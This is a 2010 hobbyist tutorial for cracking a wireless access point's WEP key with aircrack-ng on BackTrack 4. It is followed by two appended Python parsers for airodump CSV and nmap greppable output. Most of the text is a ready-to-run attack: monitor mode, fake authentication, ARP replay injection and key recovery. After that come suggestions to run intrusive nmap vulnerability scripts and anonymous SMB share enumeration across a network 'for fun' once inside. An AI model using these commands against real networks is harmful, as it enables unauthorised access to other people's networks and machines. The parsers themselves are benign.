Simple WEP Cracking
by: Tetsu
date: 8/27/2010
tools: aircrack-ng 1.0 r1645, BackTrack4 r1

------------------- tl;dr --------------------

  < boot BT4 >
  killall wicd dhclient wpa_supplicant
  rmmod ath9k                 # or whatever your module is
  modprobe ath9k
  airmon-ng start wlan0       # => mon0
  airodump-ng mon0
  * airodump-ng mon0 -c 6 -w wait
  * aireplay-ng -1 5 -a 01:23:45:67:89 wlan0
  * aireplay-ng -3 -b 01:23:45:67:89 wlan0
  * aircrack-ng *.cap

------- alternatively, with attack5.sh --------

  < boot BT4 >
  killall wicd dhclient wpa_supplicant
  rmmod ath9k                 # or whatever your module is
  modprobe ath9k
  airmon-ng start wlan0       # => mon0
  airodump-ng mon0
  * airodump-ng mon0 -c 6 -w wait
  * bash attack5.sh 01:23:45:67:89 wlan0
  * aircrack-ng *.cap

  * means run it in its own terminal

---------------------------------------------

I. Basic BT4 Usage

If you already know how to use BackTrack and Linux, you can skip this.

1. Boot the BackTrack4 (bt4) live CD

ISO images are located at http://www.backtrack-linux.org/downloads/; otherwise members of either FAMiLab or DC407 will be more than willing to provide you with a free disk. Put the disk in your CD/DVD drive, reboot, and hit some F# keys. F12 usually pulls up a boot-options menu. On MacBooks, holding Option shows a graphical boot menu; wait for the disk drive to show up. On PCs you may need to go into the BIOS and change the boot order.

2. Start an X-Windows Session

At the prompt that says something like "root@bt# ", type 'startx' (without quotes) and hit enter. This starts the desktop environment. BT4 uses KDE, but the DE changes with each version, and which one you use is entirely up to you. I suggest trying them all. WindowMaker was always my favorite. Find the Konsole, or some other terminal emulator (like xterm), and launch four of them.

II. Crackin' The WEPs

1. Reset Your Hardware

The quickest way to make sure your wireless interfaces are in the right state is to reset your hardware. My wireless card's kernel module (like a driver in Windows) is 'ath9k', so I do:

  killall wicd dhclient wpa_supplicant
  rmmod ath9k
  modprobe ath9k
  ifconfig wlan0 down
  airmon-ng start wlan0

This kills the processes that might bring the interface back up, reinserts the module into the kernel, ensures the interface is down, and starts a new monitoring interface off wlan0 called mon0. Keep in mind that your wifi interface may be eth1, eth0, or ath0. Use `iwconfig` to see a list of interfaces and their wireless extensions.

2. Lay of the Land

Run airodump-ng once for a short while to see what networks are available:

  airodump-ng mon0

then hit ctrl-c and choose a channel number to monitor on.

3. Select a Channel and Record

Say we find an AP we want to crack called 'Crack Me', and it's on channel 6. We run this to record traffic from that AP and hold the wireless card's radio on channel 6:

  airodump-ng -c 6 -w CrackMe mon0

4. Fake Authentication

It is not strictly necessary, but you will always want to use fake authentication. It tells you when your attack is succeeding, when you're in range, and whether you can actually inject. It is very useful, and ensures that you are capable of communicating with the AP. So, in its own terminal, run (with <BSSID> being the AP's MAC address from the airodump-ng listing):

  aireplay-ng -1 5 -a <BSSID> wlan0

5. ARP Replay

You will now wait for ARP packets to come across the network. Once some usable ARP packets do come through, aireplay-ng will start replaying them back to the router so that it receives a fresh re-encrypted copy of the same data; enough of these samples statistically reveal enough about the message contents to find the WEP key and passphrase:

  aireplay-ng -3 -b <BSSID> -r CrackMe-01.cap wlan0

The `-r CrackMe-01.cap` tells aireplay-ng to load data from CrackMe-01.cap (the file airodump-ng is writing to) before listening on wlan0. You may have captured 11 or 50 ARP packets before running this command, and it's just a waste of time not to use that data.

6. Aircrack-ng - The Endgame

Once you've reached about 20,000 data packets, you should be able to determine the AP's WEP key. 10,000 is sometimes enough. I've succeeded with as little as 4,000 before with very simple keys.

  aircrack-ng *.cap -e "Crack Me"

III. What Now?

BackTrack 4 comes with a bunch of neat utilities you can use after you have gained access to a network. If you are doing simple wifi pentesting, tell your client that their WEP router can be compromised. For fun, though, try these:

  lanmap -i wlan0 2>/dev/null >/dev/null &
  gqview &
  nmap --script=smb-check-vulns 192.168.1.*
  nmap -sV --script='(default or discovery) and intrusive' \
      -O 192.168.1.* -oG 192.168.1.gnmap
  nmap -p80 192.168.1.* -PN -oG http_servers.gnmap && \
      grep open http_servers.gnmap | cut -d ' ' -f 2 | \
      while read i; do firefox "$i"; done
  grep 139/open 192.168.1.gnmap | cut -d ' ' -f 2 | \
      while read i; do smbclient -N -L $i; done
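The `-w CrackMe` capture in step II.3 also writes a `CrackMe-01.csv` beside the .cap. The following parser is an added example (not Tetsu's code) that reads that CSV and lists which access points still advertise WEP, which is the same check a site owner would run to find legacy APs on their own network; the column layout is assumed from airodump-ng output of that era, and the sample rows are constructed.

```python
"""Flag WEP access points in an airodump-ng CSV (added example, not the page's code).

Assumes the 'BSSID, First time seen, ..., ESSID, Key' column layout that
airodump-ng -w writes to <prefix>-01.csv; the rows below are constructed.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2010-08-27 12:00:01, 2010-08-27 12:05:30,  6,  54, WEP , WEP, OPN, -40,      120,     1532,   0.  0.  0.  0,   8, Crack Me,
66:77:88:99:AA:BB, 2010-08-27 12:00:02, 2010-08-27 12:05:31, 11,  54, WPA2, CCMP, PSK, -55,       98,        0,   0.  0.  0.  0,   6, Secure,
CC:DD:EE:FF:00:11, 2010-08-27 12:00:05, 2010-08-27 12:05:29,  1,  11, WEP , WEP, SKA, -70,       40,       12,   0.  0.  0.  0,   5, Guest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_access_points(text):
    """Return one dict per row of the AP table (the section before the blank line)."""
    header, aps = None, []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(cell.strip() for cell in row):
            if header is not None:      # blank line: the station table starts here
                break
            continue
        cells = [cell.strip() for cell in row]
        if header is None:
            header = cells
        else:
            aps.append(dict(zip(header, cells)))
    return aps


def wep_access_points(text):
    """(bssid, channel, essid, ivs) for every AP whose Privacy column lists WEP."""
    return [(ap["BSSID"], int(ap["channel"]), ap["ESSID"], int(ap["# IV"]))
            for ap in parse_access_points(text)
            if "WEP" in ap["Privacy"].split()]


if __name__ == "__main__":
    for bssid, channel, essid, ivs in wep_access_points(SAMPLE_CSV):
        print(f"WEP  ch {channel:2d}  {bssid}  {essid!r}  ({ivs} IVs seen)")
```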
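The grep/cut pipelines in section III depend on the IP being the second space-separated field of each gnmap line. As an added example (not the author's code), here is a small parser for nmap's greppable output that reads the tab-separated `Host:` / `Ports:` fields explicitly, so the same host list can be derived for any port and state; the scan file is constructed.

```python
"""Parse nmap greppable (-oG) output (added example, not the page's code).

Each gnmap line is 'Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>//<svc>///, ...'
with optional extra tab-separated fields; SAMPLE_GNMAP is a constructed scan.
"""

SAMPLE_GNMAP = """\
# Nmap 5.21 scan initiated Fri Aug 27 13:02:11 2010 as: nmap -p80,139 192.168.1.* -PN -oG 192.168.1.gnmap
Host: 192.168.1.1 (router.lan)\tStatus: Up
Host: 192.168.1.1 (router.lan)\tPorts: 80/open/tcp//http///, 139/closed/tcp//netbios-ssn///
Host: 192.168.1.5 ()\tStatus: Up
Host: 192.168.1.5 ()\tPorts: 80/closed/tcp//http///, 139/open/tcp//netbios-ssn///
Host: 192.168.1.9 ()\tStatus: Up
Host: 192.168.1.9 ()\tPorts: 80/open/tcp//http-proxy///, 139/open/tcp//netbios-ssn///\tIgnored State: filtered (998)
# Nmap done at Fri Aug 27 13:02:40 2010 -- 256 IP addresses (3 hosts up) scanned in 29.10 seconds
"""


def parse_gnmap(text):
    """Return (ip, hostname, [(port, state, proto, service), ...]) per 'Ports:' line."""
    hosts = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts:" not in line:
            continue                     # comments and 'Status: Up' lines carry no ports
        fields = dict(part.split(": ", 1) for part in line.split("\t"))
        ip, _, hostname = fields["Host"].partition(" ")
        ports = []
        for entry in fields["Ports"].split(", "):
            # port/state/protocol/owner/service/rpcinfo/version/
            parts = entry.split("/")
            ports.append((int(parts[0]), parts[1], parts[2], parts[4]))
        hosts.append((ip, hostname.strip("()"), ports))
    return hosts


def hosts_with_open_port(text, port, proto="tcp"):
    """IPs whose scan shows <port>/<proto> in state 'open'."""
    return [ip for ip, _, ports in parse_gnmap(text)
            if any(p == port and state == "open" and pr == proto
                   for p, state, pr, _ in ports)]


if __name__ == "__main__":
    print("http:", hosts_with_open_port(SAMPLE_GNMAP, 80))
    print("smb: ", hosts_with_open_port(SAMPLE_GNMAP, 139))
```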